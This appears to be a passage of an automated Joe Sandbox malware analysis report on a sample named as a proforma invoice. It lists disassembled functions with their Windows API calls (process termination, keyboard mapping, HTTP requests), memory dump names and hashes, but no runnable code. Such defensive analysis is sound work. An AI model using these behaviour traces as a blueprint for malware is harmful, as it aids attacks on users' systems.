                                                                                                                    • Opcode ID: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
                                                                                                                    • Instruction ID: 7d2e9d9cc27edd84c377be9ca37133405d9d55cd28c3a8fe109091b58640023c
                                                                                                                    • Opcode Fuzzy Hash: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
                                                                                                                    • Instruction Fuzzy Hash: 8901A775E01309BBEF109FB69D49A5EBFB8EB49311F008076FA08A7291DA709D10CF94
                                                                                                                    Function 00270162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
                                                                                                                    • Instruction ID: 5ad20d3ca3b6f2223a3b3cb509e65e079b15f9a2dbdd5fe6d463a9155618187d
                                                                                                                    • Opcode Fuzzy Hash: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
                                                                                                                    • Instruction Fuzzy Hash: 8B0148B09027597DE3008F5A8C85A52FFA8FF19354F00411BA15847941C7B5A864CBE5
                                                                                                                    Function 002B53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B53F9
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B540F
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 002B541E
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B542D
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B5437
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B543E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
                                                                                                                    • Instruction ID: e1f4c652e98eb7a841d0453456f0078369a5de544fd4c2cffe731c863ddbb967
                                                                                                                    • Opcode Fuzzy Hash: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
                                                                                                                    • Instruction Fuzzy Hash: 33F06231542158BBD3605B52AD0DEEB7B7CEBC6B11F04016AF915D105096A05E0186B9
                                                                                                                    Function 002B7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 002B7243
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7254
                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00260EE4,?,?), ref: 002B7261
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00260EE4,?,?), ref: 002B726E
                                                                                                                      • Part of subcall function 002B6C35: CloseHandle.KERNEL32(00000000,?,002B727B,?,00260EE4,?,?), ref: 002B6C3F
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7281
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7288
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
                                                                                                                    • Instruction ID: 6e47a3fd5615cebc83bb41971c094164e79bad8a846988d5e4ce3f65ee6e749f
                                                                                                                    • Opcode Fuzzy Hash: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
                                                                                                                    • Instruction Fuzzy Hash: 8FF05E36942612EBD7912F64FE4CADA7729EF45702B100533F943910A0CB765D11CB54
                                                                                                                    Function 002A8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A899D
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 002A89A9
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002A89B2
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002A89BA
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 002A89C3
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002A89CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
                                                                                                                    • Instruction ID: 2c5f7004c80368be5aaae94cdaa003d7457b9ff3ad298adda50b190ed230e6b5
                                                                                                                    • Opcode Fuzzy Hash: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
                                                                                                                    • Instruction Fuzzy Hash: 64E0C236505001FBDA812FE5FE0C94ABB69FB89322B108232F21A81170CB329820DB58
                                                                                                                    Function 002A7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A76EA
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7702
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,002DFB80,000000FF,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7727
                                                                                                                    • _memcmp.LIBCMT ref: 002A7748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID: ,,.
                                                                                                                    • API String ID: 314563124-737214711
                                                                                                                    • Opcode ID: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
                                                                                                                    • Instruction ID: bf32499fd572683b9312d79e7941adde28a354a86976aed4996bddd6ed65c87e
                                                                                                                    • Opcode Fuzzy Hash: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
                                                                                                                    • Instruction Fuzzy Hash: 82812E71A1010AEFCB04DFA4CD84EEEB7B9FF89315F204599E506AB250DB71AE05CB64
                                                                                                                    Function 002C85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C8613
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002C8722
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C889A
                                                                                                                      • Part of subcall function 002B7562: VariantInit.OLEAUT32(00000000), ref: 002B75A2
                                                                                                                      • Part of subcall function 002B7562: VariantCopy.OLEAUT32(00000000,?), ref: 002B75AB
                                                                                                                      • Part of subcall function 002B7562: VariantClear.OLEAUT32(00000000), ref: 002B75B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: e4ee74e2921f89ab9ae02c5e3d1801f82e5d5e1f347222629794f48549fe875d
                                                                                                                    • Instruction ID: 53ca1c5788a5f3dac1f04a50b6505b92bc13760cc118af904ed5d41608205969
                                                                                                                    • Opcode Fuzzy Hash: e4ee74e2921f89ab9ae02c5e3d1801f82e5d5e1f347222629794f48549fe875d
                                                                                                                    • Instruction Fuzzy Hash: C49159746243059FC710DF24C484E6AB7E4EF89714F148A6EF88A8B361DB31E959CF92
                                                                                                                    Function 002B2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                    • _memset.LIBCMT ref: 002B2B87
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2BB6
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2C69
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B2C97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                    • Opcode ID: 9c919bdfe23a62bb2723125ea40738435734022830e84b74f4344cb8e246baf4
                                                                                                                    • Instruction ID: d4e41b3ae737b38016514d22a110ee0fc8784a480ea7d789e8adb8644f03b8be
                                                                                                                    • Opcode Fuzzy Hash: 9c919bdfe23a62bb2723125ea40738435734022830e84b74f4344cb8e246baf4
                                                                                                                    • Instruction Fuzzy Hash: 5951C271528302DBD7259F24D8456AF7BE8EF89390F04492EF895D3191DB70CD688B92
                                                                                                                    Function 00263137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c&$_&
                                                                                                                    • API String ID: 2620147621-1388094336
                                                                                                                    • Opcode ID: 49ff97a8a434d133b73f820ea13ed0397ec9457ae9619accc8d58a23ccc0e385
                                                                                                                    • Instruction ID: c74e9dcd5b1bf20f5aeb5170492256f9ec8dc6cea1ff9affe15e2aac02b51b84
                                                                                                                    • Opcode Fuzzy Hash: 49ff97a8a434d133b73f820ea13ed0397ec9457ae9619accc8d58a23ccc0e385
                                                                                                                    • Instruction Fuzzy Hash: 92515B716243428FDB25CF28C880B6ABBE5FF85314F04882DE98997351DB31E965CF82
                                                                                                                    Function 00266192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c&$ERCP
                                                                                                                    • API String ID: 2532777613-1111993731
                                                                                                                    • Opcode ID: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
                                                                                                                    • Instruction ID: 0a722adfc43d5916fa079c6a271281cc46863b62b7c10837a7a1b074c9c47fef
                                                                                                                    • Opcode Fuzzy Hash: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
                                                                                                                    • Instruction Fuzzy Hash: 9951C371920706DFDB24CF65C895BAAB7F4EF44704F20856EE94AC7291E770EAA4CB40
                                                                                                                    Function 002B2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B27C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B27DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 002B2822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00315890,00000000), ref: 002B286B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    • Opcode ID: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
                                                                                                                    • Instruction ID: e1e2f5b13f2d5680518e152f9f199c15b84f23dc24837ac0bc0770bdaf3dd093
                                                                                                                    • Opcode Fuzzy Hash: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
                                                                                                                    • Instruction Fuzzy Hash: 2B41B270614302DFD720DF24DC48B9ABBE8EF85354F044A6DF96697292D730E919CB62
                                                                                                                    Function 002CD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5
                                                                                                                      • Part of subcall function 0025784B: _memmove.LIBCMT ref: 00257899
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    • Opcode ID: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
                                                                                                                    • Instruction ID: baf81812e3c7ebd64ac43971174333e5a961fe4b984164b2eb6df75700ebb2d3
                                                                                                                    • Opcode Fuzzy Hash: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
                                                                                                                    • Instruction Fuzzy Hash: 34319275924215ABCF00EF54CC51EAEB3B5FF04720B108769E869976D1DB71A91ACF80
                                                                                                                    Function 002A8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A8F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A8F27
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 002A8F57
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    • Opcode ID: eb1127ee20e527d3a4521c4d4dd793449b9216eb308d82da34b35728d2709bee
                                                                                                                    • Instruction ID: f5fab413a3bd4a12ca4f93d44383badaae8179ad008c07ace22552a4cf6c7056
                                                                                                                    • Opcode Fuzzy Hash: eb1127ee20e527d3a4521c4d4dd793449b9216eb308d82da34b35728d2709bee
                                                                                                                    • Instruction Fuzzy Hash: D321E171A21105BFDB14ABB09C8A9FEB779DF06320B148119F825961E1DF3948299A50
                                                                                                                    Function 002C182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002C18A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002C18E9
                                                                                                                      • Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
                                                                                                                      • Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
                                                                                                                    • Instruction ID: 200adb6dc825c2d7f2230a271585d566d84e361904ba53ea620bb030c73ae1ac
                                                                                                                    • Opcode Fuzzy Hash: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
                                                                                                                    • Instruction Fuzzy Hash: 6521AFB1524209BFFB11AF609C86FBB77ADEF49744F10422EF90592141DA609D245BA1
                                                                                                                    Function 002D63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
                                                                                                                      • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
                                                                                                                      • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D6461
